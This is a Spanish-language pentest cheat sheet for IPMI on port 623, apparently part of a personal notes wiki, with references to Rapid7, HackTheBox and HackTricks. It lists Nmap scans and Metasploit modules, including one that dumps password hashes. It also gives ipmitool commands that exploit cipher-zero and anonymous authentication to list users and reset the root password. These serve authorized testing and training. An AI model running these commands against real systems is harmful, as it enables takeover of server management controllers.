623 - IPMI

Nmap

nmap -sV -p 623 IP --script=ipmi-version
nmap -n -sU -p 623 IP

Metasploit

use  auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

Probar

Herramienta ipmitool

apt-get install ipmitool
ipmitool -I lanplus -C 0 -H IP -U root -P root user list

#cambiar pw del usuario root a passw
ipmitool -I lanplus -C 0 -H IP -U root -P root user set password 2 passw

Autenticación anónima

ipmitool -I lanplus -H IP -U '' -P '' user list

#cambia pw del usuario root a passw2
ipmitool -I lanplus -H IP -U '' -P '' user set password 2 passw2

References

https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
https://academy.hackthebox.com/module/112/section/1245
https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi

Previous587 - SMPT STARTTLS Next631 - CUPS

Last updated 7 months ago